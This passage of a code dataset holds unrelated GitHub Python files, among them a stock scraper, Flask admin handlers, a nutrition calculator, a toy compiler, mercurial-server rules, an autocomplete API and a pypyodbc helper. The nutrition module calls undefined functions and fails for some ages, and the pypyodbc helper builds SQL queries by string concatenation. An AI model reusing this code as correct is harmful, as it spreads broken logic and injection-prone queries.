req.build_opener()\nopener.addheaders = [headers]\nresponse = opener.open(url)\n\n# BeautifulSoup 라이브러리로 페이지 파싱 후 해당 사이트의 맨 뒤 페이지 숫자 추출\ndoc = BeautifulSoup(response, 'lxml')\nlast_page = doc.find('td', class_='pgRR').a['href'].split('=')[-1]\n\n# 데이터프레임으로 각 페이지 정보 저장\ndf = pd.DataFrame()\nfor page in range(1, int(last_page) + 1):\n    page_url = '{}&page={}'.format(url, page)\n    response = opener.open(page_url)\n    df = df.append(pd.read_html(response, header=0)[0])\ndf = df.dropna()\n\nprint(df)","repo_name":"minjungw00/Practice_SAIP","sub_path":"Chapter_4/ch04_04.py","file_name":"ch04_04.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26155864518","text":"\nfrom app import db\nfrom app import app\nfrom app.models import Author\nfrom app.models import AuthorChanges\nfrom app.models import Genres\nfrom app.models import GenresChanges\nfrom app.models import Story\nfrom app.models import StoryChanges\nfrom app.models import Tags\nfrom app.models import TagsChanges\nfrom app.models import Watches  # used by deleteStory() below; assumed to live in app.models with the other tables\n\n\nfrom sqlalchemy import or_\n\nfrom flask import flash\nfrom flask_babel import gettext\nfrom flask_login import current_user\n\n# import app.series_tools\nfrom app.api_common import getResponse\n\n# import FeedFeeder.FeedFeeder\n\n\n\n\ndef fix_escaped_quotes(dummy_data, admin_override=False):\n\tif admin_override is False and (not current_user.is_mod()):\n\t\treturn getResponse(error=True, message=\"You have to have moderator privileges to do that!\")\n\n\t# SELECT * FROM series WHERE title LIKE E'%\\\\\\'%';\n\tbad_title = 0\n\tbad_desc = 0\n\n\n\tq = Story.query.filter(or_(Story.title.like(r\"%'%\"), Story.title.like(r\"%’%\"), Story.title.like(r\"%‘%\"), Story.title.like(r\"%“%\"), Story.title.like(r\"%”%\")))\n\titems = q.all()\n\tprint(\"Name fixing processing query resulted in %s items\" % len(items))\n\tfor item in items:\n\t\told = item.title\n\t\tnew = old\n\t\twhile any([r\"\\\"\" in new, r\"\\'\" in new, \"’\" in new, \"‘\" in new, \"“\" in new, \"”\" in new]):\n\t\t\tnew = new.replace(r\"\\'\", \"'\")\n\t\t\tnew = new.replace(r'\\\"', '\"')\n\t\t\tnew = new.replace(r\"’\", \"'\")\n\t\t\tnew = new.replace(r\"‘\", \"'\")\n\t\t\tnew = new.replace(r\"“\", '\"')\n\t\t\tnew = new.replace(r\"”\", '\"')\n\n\t\thave = Story.query.filter(Story.title == new).scalar()\n\t\tif old != new:\n\t\t\tif have:\n\t\t\t\tprint(\"Duplicate item!\", (old, new), old==new)\n\t\t\t\tmerge_series_ids(have.id, item.id)\n\t\t\telse:\n\t\t\t\tprint(\"Fixing title.\")\n\t\t\t\titem.title = new\n\t\t\t\tdb.session.commit()\n\t\t\tbad_title += 1\n\n\n\t# FUCK ALL SMART QUOTE BULLSHITS EVER\n\tq = Story.query.filter(or_(Story.description.like(r\"%'%\"), Story.description.like(r\"%’%\"), Story.description.like(r\"%‘%\"), Story.description.like(r\"%“%\"), Story.description.like(r\"%”%\")))\n\n\titems = q.all()\n\tprint(\"Series description processing query resulted in %s items\" % len(items))\n\tfor item in items:\n\t\told = item.description\n\t\tnew = old\n\n\t\twhile any([r\"\\\"\" in new, r\"\\'\" in new, \"’\" in new, \"‘\" in new, \"“\" in new, \"”\" in new]):\n\t\t\tnew = new.replace(r\"\\'\", \"'\")\n\t\t\tnew = new.replace(r'\\\"', '\"')\n\t\t\tnew = new.replace(r\"’\", \"'\")\n\t\t\tnew = new.replace(r\"‘\", \"'\")\n\t\t\tnew = new.replace(r\"“\", '\"')\n\t\t\tnew = new.replace(r\"”\", '\"')\n\t\tif old != new:\n\t\t\tprint(\"Fixing description smart-quotes and over-escapes for series: %s\" % 
item.id)\n\t\t\titem.description = new\n\t\t\tdb.session.commit()\n\t\t\tbad_desc += 1\n\n\tprint(\"Update complete.\")\n\n\treturn getResponse(\"%s main titles, %s descriptions required fixing.\" % (bad_title, bad_desc), error=False)\n\n\ndef clean_tags(dummy_data, admin_override=False):\n\tif admin_override is False and (not current_user.is_mod()):\n\t\treturn getResponse(error=True, message=\"You have to have moderator privileges to do that!\")\n\tbad_tags = 0\n\n\tbad_tags = db.session.execute('''\n\t\tSELECT\n\t\t\tCOUNT(*)\n\t\tFROM\n\t\t\ttags\n\t\tWHERE\n\t\t\ttag IN (\n\t\t\tSELECT tag\n\t\t\tFROM (\n\t\t\t\tSELECT tag\n\t\t\t\tFROM tags\n\t\t\t\tGROUP BY tag\n\t\t\t\tHAVING COUNT(*) = 1\n\t\t\t) AS ONLY_ONCE\n\t\t\t)\n\t\t''')\n\n\tbad_tags = list(bad_tags)\n\n\tdb.session.execute('''\n\t\tDELETE\n\t\tFROM\n\t\t\ttags\n\t\tWHERE\n\t\t\ttag IN (\n\t\t\tSELECT tag\n\t\t\tFROM (\n\t\t\t\tSELECT tag\n\t\t\t\tFROM tags\n\t\t\t\tGROUP BY tag\n\t\t\t\tHAVING COUNT(*) = 1\n\t\t\t) AS ONLY_ONCE\n\t\t\t)\n\t\t;\n\t\t''')\n\tdb.session.commit()\n\n\treturn getResponse(\"Found %s tags that required patching.\" % (bad_tags), error=False)\n\ndef deleteStory(data):\n\n\tif not current_user.is_mod():\n\t\treturn getResponse(error=True, message=\"I see what you (tried) to do there!\")\n\tassert 'item-id' in data\n\tassert 'mode' in data\n\n\tdelete_id = data[\"item-id\"]\n\tclean_item = Story.query.filter(Story.id==delete_id).one()\n\n\n\t# !Ordering here matters!\n\t# Change-tables have to go second.\n\tdelete_from = [\n\t\t\tAuthor,\n\t\t\tAuthorChanges,\n\t\t\tTags,\n\t\t\tTagsChanges,\n\t\t\tGenres,\n\t\t\tGenresChanges,\n\t\t\t# Story,\n\t\t\t# StoryChanges,\n\t\t]\n\n\n\tfor clearTable in delete_from:\n\t\tclearTable.query.filter(clearTable.series==clean_item.id).delete()\n\n\tWatches.query.filter(Watches.series_id==clean_item.id).delete()\n\tStory.query.filter(Story.id==clean_item.id).delete()\n\tStoryChanges.query.filter(StoryChanges.srccol==clean_item.id).delete()\n\t# db.session.delete(clean_item)\n\tdb.session.commit()\n\n\treturn getResponse(\"Story was deleted entirely!\", error=False)\n\n","repo_name":"herp-a-derp/tob2","sub_path":"app/api_handlers_admin.py","file_name":"api_handlers_admin.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38674503132","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTally\n\"\"\"\n__author__ = 'Kanru Xie'\n\nimport globalvar as glv\n\n\ndef tally_():\n    obj = glv.get_value('objective')\n    lat_size = glv.convert_float('lattice size')\n    t_card = ''\n    max_lat = int(40 / lat_size - 2)\n    center_lat = int(max_lat / 2)\n    if obj == 'x':\n        t_card = str('*F8:p (3<3[0:' + str(max_lat) + ' 0:0 0:0])')\n    elif obj == 'y':\n        t_card = str('*F8:p (3<3[0:0 0:' + str(max_lat) + ' 0:0])')\n    elif obj == 'z':\n        t_card = str('*F8:p (3<3[0:0 0:0 0:' + str(int(40 / lat_size - 1)) + '])')\n    elif obj == 'xy':\n        t_card = str('*F8:p (3<3[0:' + str(max_lat) + ' ' +\n                     str(center_lat) + ':' + str(center_lat) + ' 0:0])' + '\\n' +\n                     '*F18:p (3<3[' + str(center_lat) + ':' + str(center_lat) +\n                     ' 0:' + str(max_lat) + ' 0:0])'\n                     )\n    elif obj == 'detector':\n        t_card = str('*F8:p 2')\n    return t_card\n","repo_name":"UToledoVLinac/Virtual_Linac","sub_path":"main/input_file_creator/write_material_card/tally.py","file_name":"tally.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"73943534954","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 15th August 2016\n@author: Daniel Durrenberger\n'''\ndef LBM(sex, mass, size):\n '''\n Lean Body Mass on Wikipedia\n sex = 0 for women, 1 for men\n mass in kg\n size in m\n '''\n if sex==0:\n lbm = (0.29569*mass)+(41.813*size)-43.2933\n else:\n lbm = (0.32810*mass)+(33.929*size)-29.5336\n return lbm\n\ndef TBM(sex, mass, size):\n '''\n Typical Body Mass\n http://www.hussmanfitness.org/bmrcalc.htm\n '''\n lbm = LBM(sex, mass, size)\n if sex==0:\n factor = 1.20\n else:\n factor = 1.15\n return factor * lbm\n\ndef BMR(sex, mass, size, age):\n '''\n Metabolisme de base\n Base Metabolic Rate\n sex = 0 for women, 1 for men\n mass in kg\n size in m\n age in years\n BMR in kcal/d (1000 kcal = 4,186 Mj)\n Black and al. (1996) formula\n '''\n if age>18:\n if sex==0:\n BMR = 230 * mass**(0.48) * size**(0.50) * age**(-0.13)\n else:\n BMR = 259 * mass**(0.48) * size**(0.50) * age**(-0.13)\n elif age<1:\n BMR = 92 * mass\n return BMR\n\ndef activityFactor(sex, activityLevel=3, weeklySports=0):\n '''\n sex = 0 for women, 1 for men\n activityLevel is\n 1 - resting\n 2 - mainly sitting\n 3 - sitting + few calm activities\n 4 - standing work\n 5 - sport\n weeklySports is how many times a week you practice\n '''\n woman = [1.2, 1.4, 1.6, 1.8, 2.2]\n man = [1.3, 1.5, 1.7, 1.9, 2.4]\n if sex==0:\n factor = woman[activityLevel] + 0.3*weeklySports\n else:\n factor = man[activityLevel] + 0.3*weeklySports\n return factor\n\ndef BMI(mass, size):\n '''\n Body Mass Index\n '''\n return mass / size**2\n\ndef bmiFactor(bmi):\n '''\n il faut diminuer la DEJ calculee de 1 pour cent par point d'IMC\n en-dessus de 22 et l'augmenter systematiquement en-dessous de 22\n '''\n return 1 + (22-bmi)/100.\n\ndef DEE(sex, mass, size, age, activityLevel=3, weeklySports=0):\n '''\n calculates Daily Energy Expenditure in kcal\n sex = 0 for women, 1 for men\n activityLevel is\n 1 - resting\n 2 - mainly sitting\n 3 - sitting + few calm activities\n 4 - standing work\n 5 - sport\n weeklySports is how many times a week you practice\n '''\n bmr = calculateBMR(sex, mass, size, age)\n actFactor = activityFactor(sex, activityLevel, weeklySports)\n bmi = calculateBMI(mass, size)\n bmiFactor = bmiFactor(bmi)\n return bmr * actFactor * bmiFactor\n\ndef protein(mass, sex=1, age=30, pregnant=False, breastfeeding=False):\n '''\n calculates the appropriate amount of protein one needs daily in grams\n ANC = 0.83g/kg/j\n '''\n prot = 0.83*mass\n if age>70 or sex==1:\n prot = 1.*mass\n if pregnant:\n prot += 0.1*mass\n if breastfeeding:\n prot += 0.3*mass\n return prot\n","repo_name":"fabio-dev/behealth","sub_path":"nutrition/nutrition.py","file_name":"nutrition.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25416496410","text":"#######################################################################\n# CSC 365 Project Group 2\n# Jacob Duncan, Jakob Robinson, Terry Townsend, Brad Kivett\n#\n# Extension to the compiler to handle actual translation\n#\n#######################################################################\nfrom __future__ import annotations\nfrom PLine import PLine\nimport helpers.compiler_functions as cf\n\nregisters: dict[str, int] = {\"EDX\": 0, \"ECX\": 0, \"EBX\": 0, \"EAX\": 0}\nflags: dict[str, bool] = {\"OF\": False, \"SF\": False, \"CF\": False, \"ZF\": False}\nvariables: dict[str, int] = {}\n\n####################################\n# Variable 
Declaration\n# Brad K\n####################################\ndef declaration(pline_instance: PLine) -> int: # start by checking if signed or unsigned\n line_text: str = pline_instance.text # grab text from line instance\n vars: list[str] = line_text.split() # split words in str into list. Im not sure if there's going to be HLC with less than 3 variables\n del vars[0] # delete signed/unsigned word from variables list. EX:del vars[0]=\"signed\" --> vars[0]=\"a\" \n \n for v in vars: # for variables being declared in vars\n dec_count = len(variables) + 1 # set declaration count to length of variables (0) + 1 = 1\n variables[v] = 1024 - dec_count # set variables[v] equal to length of memory - declaration count\n print(\"Declaration line processed\") \n return 0 # counter shouldn't go up yet, return 0\n\n##########################\n# Arithmetic operations and Assignments\n# Jacob Duncan\n##########################\ndef arithmetic(pline_instance: PLine) -> int: # assignment portion of flowchart\n line_text: str = pline_instance.text # grab text from line\n vars: list[str] = line_text.split() # split variables in line into list.\n counter: int = 0\n temp_ymc: str\n isSigned: bool\n signed: list[str] = [\"x\", \"y\", \"z\"]\n assignment: str = vars[0] # get variable we are assigning a value to\n del vars[0] # delete the variable being assiged cause its stored \n del vars[0] # delete the = sign\n\n if assignment in signed:\n isSigned = True\n else:\n isSigned = False\n\n # Handle assignments here\n if len(vars) == 1: # this means that this is just an assingment operation with no arithmetic\n if any(char.isdigit() for char in vars[0]): # literal\n temp_ymc = \"movrl eax, \" + vars[0] + \"\\n\" \n counter += 3 # movrl is 3 bytes, so we increment the program_counter by 3\n else:\n address: str = str(variables[vars[0]])\n temp_ymc = \"movrm eax, \" + address + \"\\n\"\n counter += 4 # movrm is 4 bytes, so we increment the program_counter by 4\n \n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\"\n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_YMC(temp_ymc)\n\n # Handle 2-arg arithmetic\n elif len(vars) == 3: # this means it is a 2-arg operation, var[0] = arg1, var[1] = operator, var[2] = arg2\n operator: str = vars[1]\n temp_counter: int\n # Process first 2 lines of ymc\n temp_ymc, temp_counter = cf.ymc_arithemtic_movs(vars, variables, False)\n counter += temp_counter # Increment program counter by number of bytes calculated in ymc_arithemtic_movs function\n\n # Parse operators and process third line of ymc\n temp_ymc += cf.ymc_operation_2args(operator, isSigned)\n counter += 2 # All 2 arg arithmetic operations are 2 bytes\n\n # Process fourth and final line of ymc\n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\" \n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_register(\"EBX\")\n pline_instance.set_YMC(temp_ymc)\n\n # Handle 3-arg arithmetic\n elif len(vars) == 5: # this means it is 3-arg operation\n operators: list[str] = [vars[1], vars[3]]\n # Process first 3 lines of ymc\n temp_ymc, temp_counter = cf.ymc_arithemtic_movs(vars, variables, True)\n counter += temp_counter # Increment program counter by number of bytes calculated in ymc_arithemtic_movs function\n\n # Parse operators and process fourth line of ymc\n 
temp_ymc += cf.ymc_operation_3args(operators, isSigned)\n counter += 3 # All 3 arg arithmetic operations are 3 bytes\n\n # Process fifth and final line of ymc\n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\" \n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_register(\"EBX\")\n pline_instance.set_register(\"ECX\")\n pline_instance.set_YMC(temp_ymc)\n \n print(\"Arithmetic line processed\") \n return counter\n\ndef relational(pline_instance: PLine) -> int: # if/else and while statements, start by checking what each line is\n line_text: str = pline_instance.text # grab text from line\n line_list: list[str] = line_text.split() # split line into list.\n type: str = line_list[0] \n counter = 0\n\n if type == \"if\" or type == \"while\": # check if line is if/else statement or while loop \n first_operand: str = line_list[1]\n sign: str = line_list[2]\n limit = line_list[3] \n if str(first_operand) in variables: # check if first operand is a variable\n pline_instance.append_YMC(\"movrm eax, \" + str(variables[first_operand])) # ADD YMC Instruction\n counter += 4 # ADD 4 bytes for movrm\n else:\n pline_instance.append_YMC(\"movrl eax, \" + limit) # ADD YMC Instruction\n counter += 3 # ADD 3 bytes for movrl\n\n if str(limit) in variables: # check if second operand is a variable\n pline_instance.append_YMC(\"movrm ecx, \" + str(variables[limit])) # ADD YMC Instruction\n counter += 4 # ADD 4 bytes for movrm\n else:\n pline_instance.append_YMC(\"movrl ecx, \" + limit) # ADD YMC Instruction\n counter += 3 # ADD 3 bytes for movrl\n\n pline_instance.append_YMC(\"cmprr eax, ecx\")\n counter += 2 # ADD 2 bytes for cmprr\n pline_instance.set_register(\"EAX\") # set registers EAX and ECX\n pline_instance.set_register(\"ECX\")\n\n if sign == '==':\n pline_instance.add_YMC(\"jne\")\n elif sign == '!=': \n pline_instance.add_YMC(\"je\")\n elif sign == '<': \n pline_instance.add_YMC(\"jge\")\n elif sign == '<=': \n pline_instance.add_YMC(\"jg\")\n elif sign == '>': \n pline_instance.add_YMC(\"jle\")\n elif sign == '>=': \n pline_instance.add_YMC(\"jl\")\n \n counter += 3 # ADD 3 bytes to counter for jump\n else:\n pline_instance.set_YMC(\"\")\n\n print(\"Relational line processed\") \n return counter\n\n####################################\n# Print\n# Brad K\n####################################\n\ndef printD(pline_instance: PLine) -> int: # print statements\n line_text: str = pline_instance.text # grab text from line\n statement: list[str] = line_text.split() # split line into list.\n arg: str = statement[1] # set arg to second item in split_line list\n unsigned: list[str] = [\"a\",\"b\",\"c\"] # declare signed and unsigned lists for if statements below\n signed: list[str] = [\"x\",\"y\",\"z\"]\n counter: int = 0\n\n\n if arg == \"\\\\n\": # check if new line\n pline_instance.set_YMC(\"outnl\\n\") \n counter += 1 # Increase program counter by 1 (outnl [1 byte])\n return counter\n if arg in variables: # Check if arg is in variables (It won't be if it's literal)\n arg_location: str = str(variables[arg]) # set location of arg to value in dictionary and convert to string\n if arg in unsigned: # else if arg is an unsigned variable\n pline_instance.set_YMC(\"movrm eax, \" + arg_location + \"\\n\") # set YMC instruction to first move arg_location to register eax, then outs eax \n pline_instance.append_YMC(\"outu eax\")\n counter += 6 # Increase program counter by 4 bytes 
(movrm) + 2 bytes (outs)\n elif arg in signed: # else if arg is a signed variable\n pline_instance.set_YMC(\"movrm eax, \" + arg_location + \"\\n\") # same as unsigned but with 'outu eax'\n pline_instance.append_YMC(\"outs eax\")\n counter += 6 # Increase program counter by 4 bytes (movrm) + 2 bytes (outu)\n elif arg.startswith('-'): # check if literal is negative\n pline_instance.set_YMC(\"movrl eax, \" + arg + \"\\n\") # set YMC instruction to move literal arg to register eax\n pline_instance.append_YMC(\"outs eax\") # append YMC instruction to outs eax\n counter += 5 # Increase program counter by 3 bytes (movrl) + 2 bytes (outu)\n else: # else it is positive\n pline_instance.set_YMC(\"movrl eax, \" + arg + \"\\n\") # set YMC instruction to move literal arg to register eax\n pline_instance.append_YMC(\"outu eax\") # append YMC instruction to outu eax\n counter += 5 # Increase program counter by 3 bytes (movrl) + 2 bytes (outu)\n\n # Set modified registers\n pline_instance.set_register(\"EAX\")\n\n print(\"Print line processed\") \n return counter\n\ndef halt(pline_instance: PLine) -> int:\n pline_instance.set_YMC(\"hlt\")\n return 1\n\ndef default_case(pline_instance: PLine) -> int:\n print(\"Default case processed. Something went very wrong\") \n return 0 \n\n# Switch dictionary to call functions\nswitch_dict = {\n 1: declaration,\n 2: arithmetic,\n 3: relational,\n 4: printD,\n 5: halt\n}","repo_name":"jarum3/G2YMC","sub_path":"src/ymc/helpers/compiler_extension.py","file_name":"compiler_extension.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33954674951","text":"\"\"\"\nGlob-based, order-based rules matcher that can answer \"maybe\"\nwhere the inputs make clear that something is unknown.\n\"\"\"\n\nimport sys\nimport re\nimport os\nimport os.path\n\ndef globmatcher(pattern):\n p = \"[^/]*\".join(re.escape(c) for c in pattern.split(\"*\"))\n # ** means \"match recursively\" ie \"ignore directories\"\n return re.compile(p.replace(\"[^/]*[^/]*\", \".*\") + \"$\")\n\n# Returns 1 for a definite match\n# -1 for a definite non-match\n# 0 where we can't be sure because a key is None\ndef rmatch(k, m, kw):\n if k not in kw:\n return -1\n kkw = kw[k]\n if kkw is None:\n return 0\n elif m.match(kkw) is None:\n return -1\n else:\n return 1\n\ndef rule(pairs):\n matchers = [(k, globmatcher(v)) for k, v in pairs]\n def c(kw):\n return min(rmatch(k, m, kw) for k, m in matchers)\n c.patterns = [(k, m.pattern) for k, m in matchers]\n return c\n\nclass Ruleset(object):\n '''Class representing the rules in a rule file'''\n\n levels = [\"init\", \"publish\", \"write\", \"read\", \"deny\"]\n\n def __init__(self):\n self.rules = []\n self.preset = {}\n\n def set(self, **kw):\n self.preset.update(kw)\n\n def get(self, k):\n return self.preset.get(k, None)\n\n def allow(self, level, **kw):\n levelindex = self.levels.index(level)\n d = self.preset.copy()\n d.update(kw)\n for a, c in self.rules:\n m = c(d)\n if m == 1:\n # Definite match - what it says goes\n return a <= levelindex\n elif m == 0:\n # \"Maybe match\" - allow if it says yes, ignore if no\n if a <= levelindex:\n return True\n return False\n\n def readfile(self, fn):\n f = open(fn)\n try:\n self.buildrules(f)\n finally:\n f.close()\n\n def buildrules(self, f):\n \"\"\"Build rules from f\n\n f shoud be iterable per line, each line is like:\n\n level [user=pattern] [repo=pattern] [file=pattern] [branch=pattern]\n \"\"\"\n for l in f:\n l = 
l.strip()\n            if not l or l.startswith(\"#\"):\n                continue\n            l = l.split()\n            # Unrecognized actions are off the high end\n            if l[0] in self.levels:\n                ix = self.levels.index(l[0])\n            else:\n                ix = len(self.levels)\n            self.rules.append((ix,\n                rule([c.split(\"=\", 1) for c in l[1:]])))\n\nrules = Ruleset()\n","repo_name":"darksimpson/mercurial-server","sub_path":"ms/src/mercurialserver/ruleset.py","file_name":"ruleset.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"19216232109","text":"from flask import Flask, request\nimport tries_Harshil\nfrom tries_Harshil import Trie\nfrom tries_Harshil import TrieNode\nimport autocomplete2\nfrom autocomplete2 import helpers\nimport json\nfrom gensim.models import Word2Vec\nfrom collections import Counter\napp = Flask(__name__)\nhuge_file = \"/Users/harshitg/github/autocomplete/autocomplete/everything_combined_single.txt\"\nhuge_list = []\nwith open(huge_file, \"r\") as f:\n    for line in f:\n        huge_list.extend(line.split())\nkeys = huge_list\ncounter = Counter(keys)\ntrie = Trie()\ntrie.formTrie(keys)\nmodel = Word2Vec.load(\"/Users/harshitg/github/autocomplete/autocomplete/word2vec_all_cb.model\")\nmodel_vectors = model.wv\n@app.route('/',methods = ['GET','POST'])\ndef print_suggestions():\n    if request.method == 'POST':\n        auto_suggestions = trie.printAutoSuggestions(request.get_json().get('item'),huge_list,10)\n        if auto_suggestions == 0 or auto_suggestions == -1:\n            auto_suggestions = [\"No term found with this prefix\\n\"]\n            trie.insert(request.get_json().get('item'))\n            huge_list.append(request.get_json().get('item'))\n            semantic_suggestions_new = []\n            return json.dumps([auto_suggestions , semantic_suggestions_new])\n        elif auto_suggestions[0] in model_vectors:\n            semantic_suggestions = model.most_similar(positive= auto_suggestions[0], topn=10)\n            semantic_suggestions_new = []\n            for i in range(0,len(semantic_suggestions)):\n                suggestion = semantic_suggestions[i][0]\n                semantic_suggestions_new.append(suggestion)\n            return json.dumps([auto_suggestions,semantic_suggestions_new])\n        else:\n            semantic_suggestions_new = []\n            return json.dumps([auto_suggestions,semantic_suggestions_new])\n","repo_name":"hgu23/Autocomplete_shiny","sub_path":"Flask API stuff/app_single_word.py","file_name":"app_single_word.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38291498327","text":"fire_list = input().split(\"#\")\nwater = int(input())\n\ntotal_fire = 0\neffort = 0\nput_out_cells = []\n\nprint(\"Cells:\")\n\n\nfor fire in fire_list:\n    args = fire.split(sep=\" = \")\n    fire_type = args[0]\n    fire_value = int(args[1])\n    valid = False\n\n    if water < fire_value:\n        continue\n\n    if fire_type == \"High\":\n        if 81 <= fire_value <= 125:\n            valid = True\n\n    elif fire_type == \"Medium\":\n        if 51 <= fire_value <= 80:\n            valid = True\n\n    elif fire_type == \"Low\":\n        if 1 <= fire_value <= 50:\n            valid = True\n\n    # Completed: put out every valid fire, spending water and accumulating effort\n    if valid:\n        water -= fire_value\n        total_fire += fire_value\n        effort += fire_value * 0.25\n        put_out_cells.append(fire_value)\n\nfor cell in put_out_cells:\n    print(f\" - {cell}\")\n\nprint(f\"Effort: {effort:.2f}\")\nprint(f\"Total Fire: {total_fire}\")\n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Fundamentals/Lists_Basics_Exercise/seize_the_fire.py","file_name":"seize_the_fire.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"14365486922","text":"def test_brands(client):\n    \"\"\"\n    GIVEN a Flask app\n    WHEN the route '/brands/' is requested (GET)\n    THEN check the response is valid\n    \"\"\"\n    response = 
client.get('/brands/')\n    assert response.status_code == 200\n    print(response.data)\n    assert response.data","repo_name":"a-camarillo/flask-api","sub_path":"server/app/tests/functional/test_brands.py","file_name":"test_brands.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"43829508744","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'Jazz_Qi'\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nheader = 0\r\nindex_col = 0\r\n\r\npd_data = pd.read_excel(r\"D:\\py_projects\\ML\\data\\test.xlsx\",header=header,index_col=index_col)\r\n\r\ncolumns_info_list = []\r\nisNaN_columns_dict = dict(pd_data.isna().any(0))  # isnull is identical to isna; use isna throughout\r\nfor i in pd_data.columns:\r\n    columns_info_list.append([i,pd_data[i].dtype,isNaN_columns_dict[i]])\r\ndata_info = pd.DataFrame(columns_info_list,columns=('columns','dtype','NaN_column'))\r\n\r\n# Rows containing NaN values\r\nNaN_row_list = pd_data.index[pd_data.isna().any(1) == True].tolist()\r\n\r\n# Columns containing NaN values\r\nNaN_column_list = data_info['columns'][data_info['NaN_column']].tolist()\r\n\r\n# For each NaN-containing column, the rows where it is NaN\r\nNaN_rows_dict = {}\r\nfor i in NaN_column_list:\r\n    NaN_rows_dict[i] = pd_data.index[pd_data[i].isna() == True].tolist()\r\n\r\n\r\nprint(data_info)\r\nprint(NaN_row_list)\r\nprint(NaN_column_list)\r\nprint(NaN_rows_dict)\r\n\r\n\r\n\r\n\r\n","repo_name":"opop741/ML","sub_path":"InputData/InputExcel.py","file_name":"InputExcel.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"38473449841","text":"#Author:XYZ\r\n#Date:2020-09-24\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.datasets import load_iris\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.linear_model import Perceptron\r\n\r\ndef load_data():\r\n    iris = load_iris()\r\n    df = pd.DataFrame(iris.data, columns=iris.feature_names)\r\n    df['label'] = iris.target\r\n    df.columns = ['sepal length', 'sepal width', 'petal length', 'petal width', 'label']\r\n    # print(df)\r\n    data = np.array(df.iloc[:100, [0, 1, -1]])\r\n    return data\r\n\r\n\r\ndef main():\r\n    data = load_data()\r\n    X, y = data[:,:-1], data[:,-1]\r\n    y = np.array([1 if i == 1 else -1 for i in y])\r\n\r\n    clf = Perceptron(fit_intercept=False,max_iter=1000,tol=None, shuffle=False)\r\n    clf.fit(X, y)\r\n    print(clf.coef_, clf.intercept_)\r\n\r\n    x_points = np.arange(4, 8)\r\n    y_ = -(clf.coef_[0][0]*x_points + clf.intercept_)/clf.coef_[0][1]\r\n    plt.plot(x_points, y_)\r\n\r\n    plt.plot(data[:50, 0], data[:50, 1], 'bo', color='blue', label='0')\r\n    plt.plot(data[50:100, 0], data[50:100, 1], 'bo', color='orange', label='1')\r\n    plt.xlabel('sepal length')\r\n    plt.ylabel('sepal width')\r\n    plt.legend()\r\n\r\n\r\n\r\n\r\n\r\n    plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\n\r\n\r\n\r\n","repo_name":"tyousinu1984/machine_learning","sub_path":"Statistical_learning_theory/2.Perceptron/perceptron_by_sklearn.py","file_name":"perceptron_by_sklearn.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"12988387236","text":"import pypyodbc\r\n\r\n\r\nclass SQL_server:\r\n\r\n    \"\"\" Returns a list of tuples, 
without any parsing or systematization \"\"\"\r\n    @staticmethod\r\n    def read_all_data_from_bd(SQL_server_name, Table_name, *columns):\r\n\r\n        if len(columns) == 1:\r\n            columns = columns[0]\r\n\r\n        string_columns = \"\"\r\n        for i, column in enumerate(columns):\r\n            if i != 0:\r\n                string_columns += \", [\" + column.replace('[', '').replace(']', '') + \"]\"\r\n            else:\r\n                string_columns += \"[\" + column.replace('[', '').replace(']', '') + \"]\"\r\n\r\n        SQL_query = \"SELECT \" + string_columns + \" FROM [VkBot_databaze].[dbo].[\" + Table_name + \"]\"\r\n        connection = pypyodbc.connect(\r\n            'Driver={SQL Server};'\r\n            'Server=' + SQL_server_name + ';'\r\n            'Database=VkBot_databaze;'\r\n        )\r\n        cursor = connection.cursor()\r\n        cursor.execute(SQL_query)\r\n        return cursor.fetchall()\r\n\r\n    \"\"\" Returns a list of dictionaries. Everything as it should be, with no junk \"\"\"\r\n    @staticmethod\r\n    def read_dictionary_from_bd(SQL_server_name, Table_name, *columns_):\r\n\r\n        if len(columns_) == 1:\r\n            columns_ = columns_[0]\r\n\r\n        destroy_bracket = lambda s: s.replace('[', '').replace(']', '')\r\n        columns = tuple(map(destroy_bracket, columns_))\r\n\r\n        pile = SQL_server.read_all_data_from_bd(SQL_server_name, Table_name, columns)\r\n        tasks = []\r\n        for pile_task in 